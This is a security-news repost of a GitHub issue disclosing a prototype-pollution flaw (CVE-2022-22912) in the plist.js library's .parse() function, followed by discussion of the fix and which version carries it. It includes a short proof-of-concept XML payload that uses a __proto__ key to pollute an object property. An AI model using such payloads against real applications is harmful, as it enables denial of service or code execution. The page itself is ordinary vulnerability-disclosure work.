Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-22912: Prototype Pollution using .parse() · Issue #114 · TooTallNate/plist.js

Prototype pollution vulnerability via .parse() in Plist before v3.0.4 allows attackers to cause a Denial of Service (DoS) and may lead to remote code execution.

CVE
#vulnerability#dos#nodejs#js#git#java#rce#pdf

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

keerok opened this issue

Jan 6, 2022

· 6 comments

Comments

Hi, There’s a prototype pollution in .parse() related to the xml that are being parsed in it. In the following example the prototype pollution will affect the length parameter.

var plist = require(‘plist’);

var xml = ` <plist version="1.0"> <key>metadata</key> <dict> <key>bundle-identifier</key> <string>com.company.app</string> </dict> </plist>`;

console.log(plist.parse(xml)); /** * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * END OF THE NORMAL CODE EXAMPLE! * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * **/

/** * * * * * * * * * * * * * PROTOTYPE POLLUTION * * * * * * * * * * * * * **/ var xmlPollution = ` <plist version="1.0"> <dict> <key>__proto__</key> <dict> <key>length</key> <string>polluted</string> </dict> </dict> </plist>`; console.log(plist.parse(xmlPollution).length); // polluted

  • More information about the vulnerability: https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf

ghost mentioned this issue

Mar 2, 2022

ghost mentioned this issue

Mar 2, 2022

The Github advisory states this vulnerability has been fixed on 3.0.4 but I can still reproduce in 3.0.4 as well.

The version 3.0.4 has been released back in August 2021 and the vulnerability was reported on January 2022. The 3.0.4 version only inlines an external dependency so does little in terms of security.

The vulnerable code seems to be on the parsePlistXml function

new_obj[key] = parsePlistXML(node.childNodes[i]);

@TooTallNate will try to submit a PR to fix this vulnerability in the next few days, unless you want to fix yourself.

mreinstein added a commit that referenced this issue

Mar 21, 2022

Fix prototype pollution #114

Thanks for merging my PR @mreinstein . Would you please release a new version of plist with this fix? So people can patch against this prototype pollution vulnerability.

published as 3.0.5 on npm. Thanks for the PR!

this issue still happen on version 3.0.5 with nexus scan.

@Donhv the problem appears to be that NIST has the vulnerability listed as addressed in 3.0.4:
https://nvd.nist.gov/vuln/detail/CVE-2022-22912

…but it was actually addressed in 3.0.5. Nexus has listed an “advisory deviation notice” because they tested 3.0.4 and found the vulnerability still extant. I’ve informed Nexus and hopefully they will update the status of 3.0.5. (Kudos that they go through the effort of verifying!)

Updated info. Looks like dist directory is missing the patch:
#128

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907